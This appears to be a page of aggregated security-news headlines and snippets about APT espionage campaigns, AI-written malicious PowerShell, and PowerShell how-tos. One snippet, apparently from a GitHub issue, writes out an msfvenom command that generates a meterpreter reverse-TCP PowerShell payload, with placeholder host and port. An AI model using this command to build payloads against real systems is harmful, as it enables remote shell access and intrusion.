WeLiveSecurity

LongNosedGoblin tries to sniff out governmental affairs in Southeast Asia and Japan

ESET researchers discovered a China-aligned APT group, LongNosedGoblin, which uses Group Policy to deploy cyberespionage ...
The Hacker News

New COLDRIVER Malware Campaign Joins BO Team and Bearlyfy in Russia-Focused Cyberattacks

The Russian advanced persistent threat (APT) group known as COLDRIVER has been attributed to a fresh round of ClickFix-style attacks designed to deliver two new "lightweight" malware families tracked ...
GitHub

msfvenom psh-cmd payload's random powershell function name collides with builtin commands

msfvenom -p windows/x64/meterpreter/reverse_tcp -f psh-cmd LHOST=x.x.x.x LPORT=xxx Unwrap the base64 part inside the payload to reveal the actual powershell script ...
winbuzzer.com

How to Check .NET Version on CMD, PowerShell or Regedit

Maybe you’ve heard of a shiny new update for .NET Framework, seen a vulnerability disclosure, or hit a frustrating error. In all of these cases, you’ll want to ...
Bleeping Computer

Malicious PowerShell script pushing malware looks AI-written

A threat actor is using a PowerShell script that was likely created with the help of an artificial intelligence system such as OpenAI's ChatGPT, Google's Gemini, or Microsoft's CoPilot. The adversary ...
The Hacker News

CERT-UA Uncovers New Malware Wave Distributing OCEANMAP, MASEPIE, STEELHOOK

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign orchestrated by the Russia-linked APT28 group to deploy previously undocumented malware such as OCEANMAP ...
Redmond Magazine

Launching a PowerShell Script From Excel, Part 2: Order to Act

In my previous post, I showed you how to create a clickable button in Excel. That button displayed a simple message box. Now, I want to show you how to use the button to kick off a PowerShell script.